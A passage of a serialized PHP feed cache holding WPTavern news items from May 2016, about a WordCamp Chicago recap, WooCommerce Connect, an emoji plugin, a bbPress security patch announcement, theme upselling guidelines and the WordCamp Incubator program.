sessions. Giving attendees a schedule is handled differently at most camps. Some provide a paper schedule while others put it on the back of the name badge.</p>\n<p>At WordCamp Chicago, schedule boards were displayed outside each room that corresponded with a track number. This made it easier for attendees to determine if they wanted to stay in the room for the next session.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WCChicago2016Schedule.jpg\"><img class=\"size-full wp-image-54501\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/WCChicago2016Schedule.jpg?resize=1024%2C1365\" alt=\"Schedule Board Outside The Room Hosting Track 1\" /></a>Schedule Board Outside The Room Hosting Track 1\n<p>WordCamps are a great way to stress test a venue’s network but the WiFi at WordCamp Chicago was flawless. I didn’t experience any issues and it remained fast throughout the event. I didn’t stick around for lunch as there are plenty of lunch options available within walking distance of the venue.</p>\n<h2>The After Party</h2>\n<p>Most WordCamps host an after party at a restaurant, bar, or other establishment away from the venue. WordCamp Chicago’s after party was held at the venue. It included, non-alcoholic and alcoholic drinks, food, and card games on each table. It was fun mingling and networking with people without having to compete with blaring music or a loud atmosphere.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/WCChicago2016AfterParty.jpg\"><img class=\"size-full wp-image-54503\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/WCChicago2016AfterParty.jpg?resize=1024%2C768\" alt=\"WordCamp Chicago 2016 After Party\" /></a>WordCamp Chicago 2016 After Party\n<p>Out of all the sessions I attended, my favorite is <a href=\"https://2016.chicago.wordcamp.org/session/disastrous-deals-to-profitable-projects-comparing-my-best-and-worst-client-experiences/\">by Kyle Maurer,</a> who shared experiences and advice from <a href=\"http://realbigmarketing.com/\">building client websites</a> over the years.</p>\n<p>One of the biggest pieces of advice he shared is to build direct relationships with clients. No one is going to fight your battles as much as you and third-parties are unlikely to stick their neck out. Managing direct relationships leads to trust, referrals, and being rehired to do additional work.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/KyleMaurerSlideWCChicago2016.jpg\"><img class=\"size-full wp-image-54504\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/KyleMaurerSlideWCChicago2016.jpg?resize=1024%2C768\" alt=\"A Slide from Kyle Maurer\'s Presentation\" /></a>A Slide from Kyle Maurer’s Presentation\n<p>His session contains a lot of great information and I highly encourage you to watch it when it’s published on WordPress.tv.</p>\n<h2>WordCamps Offer a Lot of Value For The Price</h2>\n<p>Throughout the event, I spoke to a number of people and noted the following. Many attendees said they received more value than expected paying $40 a ticket. Some have spent hundreds of dollars on conference tickets and didn’t enjoy themselves or come away with nearly as much information.</p>\n<p>I discovered a number of attendees are part of one or more WordPress meetup groups. According to Meetup.com, there are at least <a href=\"http://www.meetup.com/find/?allMeetups=false&keywords=Chicago+WordPress&radius=25&userFreeform=chicago+I&mcId=c60601&change=yes&sort=recommended&eventFilter=mysugg\">four WordPress groups </a>with hundreds of members spread throughout the Chicago area. It’s a strong indication that the WordPress community in Chicago is thriving and supportive of each other.</p>\n<h2>WordCamp Chicago in 2017</h2>\n<p>It was a pleasure attending WordCamp Chicago and making new friends. I especially enjoyed speaking to WordPress Weekly listeners and getting their feedback. Also for those wondering, I satisfied my craving for deep-dish pizza via <a href=\"http://www.loumalnatis.com/arizona-phoenix\">Lou Malnati’s</a>. The pizza tastes better than I remembered. If you’re ever in the Chicago area, you have to try Lou Malnati’s pizza.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/TheLou.jpg\"><img class=\"size-full wp-image-54505\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/TheLou.jpg?resize=1024%2C768\" alt=\"The Lou!\" /></a>The Lou!\n<p>Everyone involved with WordCamp Chicago 2016 did a great job. If you didn’t get a chance to attend this year, don’t worry. After taking a break for a few weeks, the organizing team plans to begin organizing WordCamp Chicago 2017.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 May 2016 03:00:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"WPTavern: Automattic Introduces WooCommerce Connect, Hosted Components for E-Commerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54476\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/automattic-introduces-woocommerce-connect-hosted-components-for-e-commerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5426:\"<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/woocommerce-logo.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/woocommerce-logo.png?resize=1025%2C466\" alt=\"woocommerce-logo\" class=\"aligncenter size-full wp-image-54492\" /></a></p>\n<p><a href=\"https://www.woothemes.com/woocommerce/\" target=\"_blank\">WooCommerce</a> is the current leader in e-commerce software, capturing <a href=\"https://wappalyzer.com/categories/ecommerce\" target=\"_blank\">31% of the market</a>, thanks to its relatively user-friendly interface and connection to WordPress. However, setting up a WooCommerce site, or any e-commerce site for that matter, is not for the faint of heart, no matter how user-friendly the software. It requires knowledge of hosting, PCI compliance, payment gateways, SSL certificates, shipping methods, tax, and more.</p>\n<p>When <a href=\"http://wptavern.com/automattic-acquires-woocommerce\" target=\"_blank\">Automattic acquired WooCommerce</a> last May, the company accepted the challenge to make it as easy to create stores online as WordPress.com has done for websites.</p>\n<p>“I believe that the web needs an open, independent and easy-to-use commerce platform that you can run yourself on your own website,” Matt Mullenweg said in his <a href=\"https://www.youtube.com/watch?v=xJOfTB8-daA\" target=\"_blank\">video</a> announcement of the acquisition.</p>\n<p>Automattic has been working to simplify selling with WooCommerce and today the company announced <a href=\"https://www.woothemes.com/2016/05/woocommerce-connect-announcement/\" target=\"_blank\">WooCommerce Connect</a>, the secret project that Mullenweg <a href=\"https://twitter.com/WooConf/status/717725650916741120\" target=\"_blank\">hinted</a> at during WooConf.</p>\n<p>WC Connect is WooCommerce’s new Automattic-hosted SaaS architecture that was created to offer store features in a more user-friendly way. It is built on the WP REST API and offers a simplified Calypso-style interface for configuring options.</p>\n<p>The first service offered via the alpha version of WC Connect is real-time USPS shipping rates for US-based stores. It eliminates the need for a USPS API key as well as a subscription key from WooCommerce. One of the advantages for the user is that there are fewer software updates to install for extensions, as all the code is maintained on Automattic’s servers.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/usps-wc-connect.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/usps-wc-connect.png?resize=650%2C362\" alt=\"usps-wc-connect\" class=\"aligncenter size-full wp-image-54493\" /></a></p>\n<h3>What’s Next for WooCommerce Connect?</h3>\n<p>If the testing goes well, WooCommerce plans to roll Connect into the plugin’s core to make it easier to serve more hosted e-commerce components. The team is also working on expanding shipping options for the beta.</p>\n<p>“In the near future we hope to integrate with further shipping services, most likely Canada Post next,” said WooThemes co-founder <a href=\"https://twitter.com/mark_forrester\" target=\"_blank\">Mark Forrester</a>. “Shipping and payment options seem the logical place for us to start.”</p>\n<p>Forrester confirmed that while the USPS shipping method is free, WooThemes is exploring monetizing other service offerings in the future. If WC Connect has a successful beta period, the team will consider using the same model for offering payment gateways in the future.</p>\n<p>“Setting up payments for your store should be simple and behind the scenes,” Forrester said. “We believe we can offer better options for our customers working closely with payment partners and using connected services.”</p>\n<p>Forrester said that the team hopes WC Connect can be baked into WooCommerce core soon, but they will make the decision based on user feedback from the alpha/beta period.</p>\n<p>Those who create WooCommerce extensions and depend on its ecosystem may be wondering whether the SaaS model will overtake the plugin entirely. Last May, during his WooCommerce Q&A, Matt Mullenweg <a href=\"https://ma.tt/2015/05/woomattic/#comment-583541\" target=\"_blank\">confirmed</a> that Automattic is not moving towards a 100% SaaS model.</p>\n<p>“If or when we do SAAS, the plugin isn’t going away, it’ll continue as it has,” Mullenweg said.</p>\n<p>WooCommerce is not being rolled into Jetpack, as many suspected when Automattic acquired the product. However, WC Connect does require users to connect to WordPress.com via Jetpack.</p>\n<p>“We feel it makes sense to leverage the code/infrastructure of one of the most powerful WordPress connected services,” Forrester said.</p>\n<p>The team is aiming to make WC Connect a simpler way to connect services to online stores without users having to leave their WooCommerce dashboards. Many store owners would rather pay for hosted software they don’t have to update as opposed to self-hosted extensions that require regular maintenance.</p>\n<p>If the strategy of offering hosted e-commmerce components succeeds at making store management easier for non-developers, Automattic will be able to profit from offering compelling commercial WC Connect services, such as payment gateways, and expand WooCommerce’s global reach.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 May 2016 22:20:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: New Super Emoji Plus+ Plugin Adds an Elegant Emoji Picker to WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54422\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/new-super-emoji-plus-plugin-adds-an-elegant-emoji-picker-to-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3082:\"<p>Last week when Beyoncé released her new Lemonade album, <a href=\"http://www.wired.com/2016/04/beyonce-lemonade-lemon-emoji/\" target=\"_blank\">lemon and bee emoji usage spiked on Twitter</a>. According to Twitter’s stats, during the month of April there were more than 2 million tweets that included at least one lemon emoji, 62% of which happened since the album release. The bee emoji, representing the Beyhive of Beyoncé fans, also found its way into 1.8 million tweets during April.</p>\n<p>There’s no denying that emoji permeate our culture and communication on the web, especially the mobile web. When people are excited, when they are communicating from the heart, they often use emoji. According to a study performed by emotional marketing platform Emogi last year, <a href=\"http://www.adweek.com/socialtimes/report-92-of-online-consumers-use-emoji-infographic/627521\" target=\"_blank\">92% of people online use emoji</a> and 63% of them are frequent users.</p>\n<p>Last year WordPress 4.2 <a href=\"http://wptavern.com/wordpress-4-2-on-track-to-expand-core-support-for-emoji\" target=\"_blank\">expanded core support for emoji</a>, adding along with it the ability to natively handle Chinese, Japanese, and Korean characters. This improvement came not a moment too soon, but emoji are still not readily accessible when publishing with WordPress until you launch the emoji keyboard for your operating system. There’s something disjointed about having to launch a separate keyboard when you’re trying to compose your thoughts.</p>\n<p><a href=\"https://wordpress.org/plugins/super-emoji-plus/\" target=\"_blank\">Super Emoji Plus+</a> is a new plugin that makes emoji more accessible. It was created by <a href=\"https://profiles.wordpress.org/ericlewis/\" target=\"_blank\">Eric Andrew Lewis</a>, a WordPress core contributor and developer at The New York Times. The plugin adds an elegant emoji picker to the post edit screen. It can be launched from the toolbar or via autocomplete when you start typing an emoji name, such as “:lemon”.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/super-emoji-toolbar.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/super-emoji-toolbar.png?resize=1025%2C640\" alt=\"super-emoji-toolbar\" class=\"aligncenter size-full wp-image-54458\" /></a></p>\n<p>If you use emoji in your WordPress posts, Super Emoji Plus+ provides convenient access to the full list. There’s no easier way to add emoji if you’re working from a desktop, as most emoji keyboard experiences are inferior to the one presented in this plugin. Having it installed removes the need for cheat sheets and saves you from having to remember the correct key combinations to launch an emoji keyboard. Super Emoji Plus+ <a href=\"https://ericandrewlewis.com/2016/04/super-emoji-plus-is-now-in-beta/\" target=\"_blank\">went into beta last week</a> and is now <a href=\"https://wordpress.org/plugins/super-emoji-plus/\" target=\"_blank\">available on WordPress.org</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 May 2016 06:15:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: bbPress 2.5.9 Patches Cross-Site-Scripting Vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54439\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://wptavern.com/bbpress-2-5-9-patches-cross-site-scripting-vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:945:\"<p>John James Jacoby, lead developer of bbPress, has <a href=\"https://bbpress.org/blog/2016/05/bbpress-2-5-9/\">released bbPress 2.5.9</a> to patch a security vulnerability, “bbPress 2.5.8 and below are susceptible to a cross-site-scripting vulnerability that’s due to the way users are linked to their profiles when they are mentioned in topics and replies,” Jacoby said.</p>\n<p>Marc-Alexandre Montpas is credited for <a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">responsibly disclosing</a> the vulnerability to the WordPress security team. The patch has already been applied to bbPress 2.6, which is currently in development. Users are advised to update their bbPress installations as soon as possible. Users who encounter issues updating to 2.5.9 can report them to the <a href=\"https://bbpress.org/forums/\">bbPress support forums</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 May 2016 23:10:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: WordPress Theme Review Team Votes on New Guidelines to Ban Obtrusive Upselling\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54428\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"http://wptavern.com/wordpress-theme-review-team-votes-on-new-guidelines-to-ban-obtrusive-upselling\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4201:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/post-no-bills.jpg\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/post-no-bills.jpg?resize=1024%2C602\" alt=\"photo credit: Post no bills - (license)\" class=\"size-full wp-image-54450\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/24415314@N02/26151211080\">Post no bills</a> – <a href=\"https://creativecommons.org/licenses/by-nc-sa/2.0/\">(license)</a>\n<p>One of the main items on the agenda for the Theme Review Team this week was to finalize what type of upselling is allowed in themes hosted on WordPress.org. With the requirement of using the customizer for options, theme authors have gotten creative with upsells and will sometimes include panels and sections that are inoperable unless the user purchases the commercial version.</p>\n<p>The team voted on a set of guidelines previously discussed. The counts shown below represent votes in favor of each individual guideline, and no members voted against any of them, according to the reckoning Justin Tadlock posted in the <a href=\"https://make.wordpress.org/themes/2016/05/03/may-3rd-meeting-notes/\" target=\"_blank\">meeting notes</a>:</p>\n<ul>\n<li>No global nags at top of admin pages. +12</li>\n<li>One top-level link in the customizer (other unobtrusive links in sections allowed). +8</li>\n<li>Allow one Appearance sub-page. +11</li>\n<li>No options or panels/sections behind a paywall. +11</li>\n</ul>\n<p>Overall, team members agreed that any upsell links should be unobtrusive and the new proposed guidelines favor keeping the customizer clean and the Appearance menu simple. Although the majority of Theme Review Team members are in favor of the items above, their inclusion in the handbook is not yet set in stone.</p>\n<p>“Note that we might change some of the wording for clarity if/when these become guidelines,” Tadlock said. “The admins will review these items for inclusion as guidelines and have further discussion if need be.”</p>\n<h3>Theme Review Team Considers Adding a Tag to Designate Themes with a Commercial Upgrade</h3>\n<p>Contributors are looking to add a new designation for freemium WordPress.org extensions that have commercial counterparts available elsewhere. In a recent Meta Team meeting, Matt Mullenweg <a href=\"https://wordpress.slack.com/archives/meta/p1461801845000324\" target=\"_blank\">proposed an agenda item</a> for consideration in the redesign of the Plugin Directory.</p>\n<p>“I would love for y’all to figure out a tagging system that will help people know better what’s behind the installation of a plugin,” Mullenweg said. “Does it connect to an external service? Is there a premium version? Is it useful without those things?</p>\n<p>“If we can figure out a way to classify those three as examples, it’ll cover a lot of business models people are attempting in the directory,” Mullenweg said, referring to the original examples of Akismet, VaultPress, and Jetpack that he mentioned previously.</p>\n<p>“This can be separate from the 3-tag limit,” he said. “It’s really a special tag, and honor system is fine to start for self-classification.”</p>\n<p>This hasn’t yet been implemented in the new Plugin Directory, but Konstantin Obenland has the item on his list for when the Meta Team moves forward with an <a href=\"https://make.wordpress.org/plugins/2016/02/25/re-thinking-tags-in-the-plugin-directory/\" target=\"_blank\">overhaul of the tagging system</a>.</p>\n<p>As a result of this discussion, the Theme Review Team is also considering adding a “pro” designation for themes that have a commercial version available. Tadlock said that the team will be following up on the plugin directory discussions and will look to implement improved tagging in line with what the Meta Team decides.</p>\n<p>The Theme Review Team ran out of time during this week’s meeting but will discuss the possibility of a “pro” tag next week. If you want to be part of this discussion, make sure to join the #themereview channel on WordPress’ Slack.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 May 2016 21:58:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"WPTavern: WordCamp Incubator Program Receives 182 Applications, Narrows Candidates to 16 Communities\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54398\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:109:\"http://wptavern.com/wordcamp-incubator-program-receives-182-applications-narrows-candidates-to-16-communities\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3358:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/incubator.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/incubator.jpg?resize=1024%2C505\" alt=\"photo credit: Chilliwack Chicken Chick - (license)\" class=\"size-full wp-image-54415\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/15521309@N05/16688186434\">Chilliwack Chicken Chick</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>In February the WordPress Community team announced that it would be <a href=\"http://wptavern.com/wordpress-to-launch-experimental-wordcamp-incubator-program\" target=\"_blank\">launching an experimental WordCamp Incubator program</a>. After a short application window of less than two weeks, the team received 182 applications from cities all over the world. Andrea Middleton <a href=\"https://make.wordpress.org/community/2016/04/28/wordcamp-incubator-update/\" target=\"_blank\">reported</a> that the team has narrowed the submissions down to the following 16 communities:</p>\n<ul>\n<li>Denpasar, Indonesia</li>\n<li>Chandigarh, India</li>\n<li>Colombo, Sri Lanka</li>\n<li>Thessaloniki, Greece</li>\n<li>Harare, Zimbabwe</li>\n<li>Budapest, Hungary</li>\n<li>Kalamata, Greece</li>\n<li>Kampala, Uganda</li>\n<li>Kochi, India</li>\n<li>Lagos, Nigeria</li>\n<li>Medellin, Colombia</li>\n<li>Nagpur, India</li>\n<li>Nairobi, Kenya</li>\n<li>San Jose, Costa Rica</li>\n<li>Udaipur, India</li>\n<li>Ulyanovsk, Russia</li>\n</ul>\n<p>Some of these communities already have active local meetups and others have no organization whatsoever. Selection of the final cities will be based on the location’s potential to foster an emerging WordPress community.</p>\n<p>The original plan was to incubate three WordCamps in 2016, but due to staffing changes the new scaled back plan is to commit to two events and intensively mentor a third. Middleton explained that the difference between the two is in the amount of support the local team will receive from the designated community team deputy:</p>\n<blockquote><p>Incubating an event will involve the deputy both advising local volunteers — acting as a kind of project manager for the team — as well as doing some of the organizing work on the event, like a lead organizer usually does. Intensively-mentoring will be more project management and involve less actual organizing work on the part of the deputy.</p></blockquote>\n<p>Middleton said the team is speaking with the remaining applicants about their communities and assessing their abilities to organize a one-day, one-track WordCamp with the help of the community team. The small events will focus on getting the local community connected for future events.</p>\n<p>The WordCamp Incubator program is an intriguing concept that has so far received a great deal of interest from potential new organizers. Many locations in the remaining list of candidates are situated in regions that are not as easily accessible to existing WordPress communities. These are places that might not otherwise have an opportunity to host a WordCamp for years without a little boost.</p>\n<p>We’ll be following the progress of the Incubator program to see if the experiment can successfully hatch a handful of new local communities. The three locations selected will be announced this month.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 May 2016 16:15:10 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: BuddyExtender: A Plugin for Configuring Internal BuddyPress Settings\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54342\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/buddyextender-a-plugin-for-configuring-internal-buddypress-settings\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2297:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/03/controls.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/03/controls.jpg?resize=960%2C443\" alt=\"photo credit: Drew Patrick Miller\" class=\"size-full wp-image-52988\" /></a>photo credit: <a href=\"https://stocksnap.io/photo/2724C9A9DE\"> Drew Patrick Miller</a>\n<p>The BuddyPress codex has a long list of <a href=\"https://codex.buddypress.org/getting-started/customizing/changing-internal-configuration-settings/\" target=\"_blank\">internal configuration settings</a> that are not exposed in the plugin’s admin settings page. These are short definition lines that can be added to a site’s <em><a href=\"https://codex.buddypress.org/themes/bp-custom-php/\" 